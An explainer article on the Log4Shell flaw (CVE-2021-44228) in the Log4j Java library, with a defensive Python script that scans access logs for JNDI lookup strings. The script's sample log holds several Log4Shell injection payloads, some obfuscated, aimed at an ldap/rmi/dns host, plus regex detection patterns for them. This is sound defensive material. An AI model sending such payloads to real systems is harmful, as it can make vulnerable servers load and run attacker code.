What is Log4Shell (Log4j Vulnerability): Zero Day Critical Vulnerability
According to cybersecurity researchers, an exploitable software flaw could give attackers unrestricted access to computer systems. The flaw was first observed by researchers at LunaSec, who caution that "a large number of services" are exposed to it because of Log4j's "ubiquitous" presence; it was discovered in the Microsoft-owned video game Minecraft.
If an attacker gains control of a computer system and can run 'arbitrary code' on it, the system is compromised.
An attacker who successfully exploits this vulnerability can take complete control of the target server.
The Log4j Java library is used by software developers all over the world to keep track of every action that occurs within an application, which is why it is so widely deployed.
The feature at the root of the flaw, known as "Message Lookup Substitution," is enabled by default in the library.
It allows specific strings in a log message to be replaced by other, dynamically generated strings during logging, hence boosting performance.
At the time of writing it has been assigned the identifier CVE-2021-44228, the official designation given to each software vulnerability as members of the security industry discover it.
According to the technical description in the CVE record, when message lookup substitution is enabled, "An attacker who has influence over log messages or log message parameters can cause arbitrary code to be loaded from LDAP servers."
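The passages above describe the mechanism (lookup strings substituted into log messages) and the trigger (attacker influence over what gets logged). As an added example that is not part of the original article, the following Python script shows the defender's side of that: it scans web access log lines for lookup strings that request a JNDI provider, first collapsing the nested `${lower:..}`, `${upper:..}` and `${..:-default}` lookups that are used to hide the word "jndi" from naive string matching. The log lines and hosts are constructed for the example (hosts are in the 203.0.113.0/24 documentation range), the function names are my own, and the script assumes only the Log4j 2 style `${...}` lookup syntax, nothing about any particular product.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Constructed sample (not real traffic): a web-server access log in which the
# User-Agent field is attacker-influenced input that a Java backend might pass
# to Log4j. Hosts are from the 203.0.113.0/24 documentation range.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://203.0.113.9:1389/a}"
10.0.0.8 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:rmi}://203.0.113.9/x}"
10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /api HTTP/1.1" 200 42 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.9/z}"
10.0.0.10 - - [10/Dec/2021:12:00:05 +0000] "GET /price?x=${env:HOME} HTTP/1.1" 200 42 "-" "curl/7.64"
"""

# Innermost lookups that only rewrite text; evaders nest them to hide the word
# "jndi". Both patterns deliberately exclude a nested "${" so that the innermost
# lookup is resolved first on each pass.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")  # ${key:-default} -> default
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def normalize(value: str, max_rounds: int = 10) -> str:
    """Collapse nested ${lower:..}, ${upper:..} and ${..:-default} lookups,
    innermost first, until nothing changes. Case is left alone because the
    JNDI match below is case-insensitive anyway."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), value)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == value:
            break
        value = new
    return value


@dataclass
class Finding:
    line_no: int
    client_ip: str
    scheme: str       # JNDI provider requested, e.g. ldap, rmi, dns
    normalized: str   # the de-obfuscated lookup string that matched


def scan(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per log line that contains a (possibly obfuscated)
    JNDI lookup string after normalization."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(lines, start=1):
        if "${" not in raw:            # cheap pre-filter: no lookup syntax at all
            continue
        norm = normalize(raw)
        m = _JNDI_LOOKUP.search(norm)
        if not m:
            continue                   # a lookup, but not a JNDI one
        end = norm.find("}", m.start())
        snippet = norm[m.start(): end + 1] if end != -1 else norm[m.start():]
        client_ip = raw.split(" ", 1)[0]  # first access-log token is the client
        findings.append(Finding(line_no, client_ip, m.group(1).lower(), snippet))
    return findings


def scan_text(text: str) -> List[Finding]:
    return scan(text.splitlines())


if __name__ == "__main__":
    for f in scan_text(SAMPLE_LOG):
        print(f"line {f.line_no}: {f.client_ip} sent jndi:{f.scheme} lookup -> {f.normalized}")
```

Run against the constructed sample it flags lines 2, 3 and 4 (ldap, rmi and dns providers respectively) and leaves the `${env:HOME}` line alone, since that is a lookup but not a JNDI one; a stricter deployment might still record any surviving `${` as low-severity. A scan like this is a triage aid for finding which hosts were probed and from where; it does not replace patching the library, which the article notes companies must do as quickly as feasible.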
Because the vulnerability has very probably already been exploited by attackers to gain access to specific computer systems, its public disclosure should be treated with extreme caution. Now that the exploit is public, companies will be forced to remediate as soon as is realistically feasible.